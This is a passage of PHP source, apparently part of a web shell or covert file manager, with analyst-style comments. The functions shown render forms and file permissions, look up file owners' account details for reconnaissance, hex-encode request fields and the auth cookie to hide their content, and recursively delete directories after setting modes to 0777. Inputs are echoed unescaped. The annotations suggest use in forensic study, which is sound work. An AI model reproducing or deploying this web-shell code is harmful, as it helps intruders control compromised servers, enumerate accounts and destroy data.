mhtml("<form name=\"$a[name]\" id=\"$a[name]\" action=\"" . SELF . "\" method=\"$a[method]\" $a[onsubmit]>");
if (isset($a['title'])) {
mhtml('<h2>' . $a['title'] . ' »</h2>');
}
}
/**
 * Prints a hidden input whose id and name are $a and whose value is $b.
 * The value is interpolated without escaping.
 *
 * @param string $a Field name and id.
 * @param string $b Field value.
 */
function fhide($a, $b = ''){
mhtml("<input id=\"$a\" type=\"hidden\" name=\"$a\" value=\"$b\"/>");
}
/**
 * Prints a "Go back..." form that returns to the file view (act=file) of the
 * current directory, read from the global $cwd.
 */
function gback(){
mhtml('<form action="' . SELF . '" method="post"><input type="hidden" name="act" value="file"/><input type="hidden" name="cwd" value="' . $GLOBALS['cwd'] . '"/><p><input class="bt" type="submit" value="Go back..."></p></form>');
}
/**
 * Returns the permission bits of $a as the last four octal digits of
 * fileperms(), e.g. '0755'.
 *
 * @param string $a Path.
 * @return string Four-character octal mode.
 */
function gchmod($a){
return substr(base_convert(fileperms($a), 10, 8), -4);
}
/**
 * Renders the mode of $a as a ten-character string in the style of `ls -l`.
 *
 * @param string $a Path.
 * @return string Type character followed by owner, group and world rwx
 *                triplets.
 */
function gperms($a){
$b = fileperms($a);
// File-type character, chosen by the first mask that matches, in this order:
// s, d, l, -, b, c, p; '?' when none match.
if (($b & 0xc000) === 0xc000) {
$c = 's';
} elseif (($b & 0x4000) === 0x4000) {
$c = 'd';
} elseif (($b & 0xa000) === 0xa000) {
$c = 'l';
} elseif (($b & 0x8000) === 0x8000) {
$c = '-';
} elseif (($b & 0x6000) === 0x6000) {
$c = 'b';
} elseif (($b & 0x2000) === 0x2000) {
$c = 'c';
} elseif (($b & 0x1000) === 0x1000) {
$c = 'p';
} else {
$c = '?';
}
// $d = owner bits, $e = group bits, $f = world bits.
$d['read'] = $b & 00400 ? 'r' : '-';
$d['write'] = $b & 00200 ? 'w' : '-';
$d['execute'] = $b & 00100 ? 'x' : '-';
$e['read'] = $b & 00040 ? 'r' : '-';
$e['write'] = $b & 00020 ? 'w' : '-';
$e['execute'] = $b & 00010 ? 'x' : '-';
$f['read'] = $b & 00004 ? 'r' : '-';
$f['write'] = $b & 00002 ? 'w' : '-';
$f['execute'] = $b & 00001 ? 'x' : '-';
// Bits 0x800 / 0x400 / 0x200 replace the execute character with s/S (owner),
// s/S (group) and t/T (world); lower case when execute is also set.
if ($b & 0x800) {
$d['execute'] = $d['execute'] == 'x' ? 's' : 'S';
}
if ($b & 0x400) {
$e['execute'] = $e['execute'] == 'x' ? 's' : 'S';
}
if ($b & 0x200) {
$f['execute'] = $f['execute'] == 'x' ? 't' : 'T';
}
return $c . $d['read'] . $d['write'] . $d['execute'] . $e['read'] . $e['write'] . $e['execute'] . $f['read'] . $f['write'] . $f['execute'];
}
/**
 * usort() comparator for the directory and file lists.
 *
 * Reads the global $sort: $sort[0] is the array key to compare and $sort[1]
 * the direction (truthy keeps the comparison result, falsy inverts it).
 * Numeric values are compared with '<', everything else with strcmp().
 *
 * @param array $a First list row.
 * @param array $b Second list row.
 * @return int Comparison result with the direction applied.
 */
function gsort($a, $b){
global $sort;
if (is_numeric($a[$sort[0]])) {
return ($a[$sort[0]] < $b[$sort[0]] ? -1 : 1) * ($sort[1] ? 1 : -1);
} else {
return strcmp($a[$sort[0]], $b[$sort[0]]) * ($sort[1] ? 1 : -1);
}
}
/**
 * Returns an HTML link describing the owner of $a, or '' when the POSIX
 * extension is missing or the lookup fails.
 *
 * The link text is the owner's account name; its title attribute lists the
 * account name, uid, gid, home directory and login shell taken from
 * posix_getpwuid(). This gives the operator local-account reconnaissance for
 * every listed entry.
 *
 * @param string $a Path.
 * @return string HTML fragment or ''.
 */
function guid($a){
if (function_exists('posix_getpwuid')) {
$b = posix_getpwuid(fileowner($a));
if ($b && is_array($b)) {
return ' / <a href="javascript:exe(\'file\', \'\');" title="User: ' . $b['name'] . "
Uid: " . $b['uid'] . "
Gid: " . $b['gid'] . "
Dir: " . $b['dir'] . "
Shell: " . $b['shell'] . '">' . $b['name'] . '</a>';
}
}
return '';
}
/**
 * Encodes $a as lowercase hex, two digits per byte.
 *
 * Used for the auth cookie value and as the counterpart of the hex encoding
 * that the page's JavaScript applies to p3.
 *
 * @param string $a Input bytes.
 * @return string Hex string.
 */
function hex($a){
$b = '';
for ($c = 0; $c < strlen($a); $c++) {
// '0' prefix plus substr(-2) pads single-digit values to two characters.
$b .= substr('0' . dechex(ord($a[$c])), -2);
}
return $b;
}
/**
 * Wraps gperms($a) in a coloured span: red when the path is not readable,
 * black when readable but not writable, green when writable by the PHP
 * process.
 *
 * @param string $a Path.
 * @return string HTML fragment.
 */
function mcolor($a){
if (!is_readable($a)) {
return '<span style="color: #f00;">' . gperms($a) . "</span>";
} elseif (!is_writable($a)) {
return '<span style="color: #000;">' . gperms($a) . "</span>";
} else {
return '<span style="color: #090;">' . gperms($a) . "</span>";
}
}
/**
 * Prints $a inside a highlighted status box. The text is not escaped.
 *
 * @param string $a Message (may contain HTML).
 */
function message($a){
echo '<div style="margin: 0 auto 12px auto; background: #ffffe0; border: 1px solid #e6db55; padding: 10px; font: 14px; text-align: center; font-weight: bold;">' . $a . '</div>';
}
/**
 * Echoes $a followed by a newline; the output primitive used by the other
 * HTML helpers.
 *
 * @param string $a Raw HTML.
 */
function mhtml($a){
echo $a . "\n";
}
/**
 * Prints an input element.
 *
 * Recognised keys of $a: 'size' (default 65), 'type' (default 'text'),
 * 'title' (label, followed by a line break), 'class' (default 'input'),
 * 'name' (also used as id), 'value', and 'newline' (wraps the field in a
 * paragraph when set). Values are interpolated without escaping.
 *
 * @param array $a Field options.
 */
function minput($a = []){
$a['size'] = isset($a['size']) && $a['size'] > 0 ? "size=\"$a[size]\"" : "size=\"65\"";
$a['type'] = isset($a['type']) ? $a['type'] : 'text';
$a['title'] = isset($a['title']) ? $a['title'] . '<br/>' : '';
$a['class'] = isset($a['class']) ? $a['class'] : 'input';
$a['name'] = isset($a['name']) ? $a['name'] : '';
$a['value'] = isset($a['value']) ? $a['value'] : '';
if (isset($a['newline'])) mhtml('<p>');
mhtml("$a[title]<input class=\"$a[class]\" name=\"$a[name]\" id=\"$a[name]\" value=\"$a[value]\" type=\"$a[type]\" $a[size]/>");
if (isset($a['newline'])) mhtml('</p>');
}
/**
 * Prints a 135x45 textarea inside a paragraph.
 *
 * Recognised keys of $a: 'title' (label), 'name' (also used as id) and
 * 'value' (initial content; the edit view passes it already HTML-escaped).
 *
 * @param array $a Field options.
 */
function mtext($a = []){
$a['title'] = isset($a['title']) ? $a['title'] . '<br/>' : '';
$a['name'] = isset($a['name']) ? $a['name'] : '';
mhtml("<p>$a[title]<textarea class=\"area\" id=\"$a[name]\" name=\"$a[name]\" cols=\"135\" rows=\"45\">$a[value]</textarea></p>");
}
/**
 * Recursively deletes directory $a.
 *
 * Every entry, and finally the directory itself, is chmod'ed to 0777 before
 * it is removed. Forensic note: a partially failed run can leave surviving
 * entries with mode 0777.
 *
 * @param string $a Directory path.
 * @return int 1 when the final rmdir() succeeded, otherwise 0 (also 0 when
 *             scandir() returned nothing).
 */
function remove($a){
$b = scandir($a);
if ($b) {
$b = array_diff($b, ['..', '.']);
foreach ($b as $c) {
if (is_dir($a . '/' . $c)) {
chmod($a . '/' . $c, 0777);
remove($a . '/' . $c);
} else {
chmod($a . '/' . $c, 0777);
unlink($a . '/' . $c);
}
}
chmod($a, 0777);
return rmdir($a) ? 1 : 0;
} else {
return 0;
}
}
/**
 * Returns the total size in bytes of all files below directory $a,
 * descending into subdirectories.
 *
 * @param string $a Directory path.
 * @return int|float Sum of the file sizes.
 */
function rsize($a){
$b = opendir($a);
$c = 0;
while ($d = readdir($b)) {
if ($d != '.' && $d != '..') {
$e = $a . '/' . $d;
$c += is_dir($e) ? rsize($e) : sprintf("%u", filesize($e));
}
}
closedir($b);
return $c;
}
/**
 * Formats a byte count with a unit suffix, dividing by 1024 until the value
 * is below 1024 or the largest unit (PB) is reached; rounded to two decimals.
 *
 * @param int|float|string $a Size in bytes.
 * @return string For example '1.5 KB'.
 */
function ssize($a){
$b = ['Bytes', 'KB', 'MB', 'GB', 'TB', 'PB'];
for ($c = 0; $a >= 1024 && $c < 5; $c++) {
$a /= 1024;
}
return round($a, 2) . ' ' . $b[$c];
}
/**
 * Decodes a hex string into bytes; the inverse of hex().
 *
 * Applied to the p3 request field, which the page's JavaScript hex-encodes
 * before submitting. Analysts can decode captured p3 values the same way to
 * recover what was written, renamed or re-timestamped.
 *
 * @param string $a Hex string.
 * @return string Decoded bytes.
 */
function unhex($a){
$b = '';
// Consumes two characters per step; an unpaired trailing character is
// ignored because the loop stops at strlen - 1.
for ($c = 0; $c < strlen($a) - 1; $c += 2) {
$b .= chr(hexdec($a[$c] . $a[$c + 1]));
}
return $b;
}
?>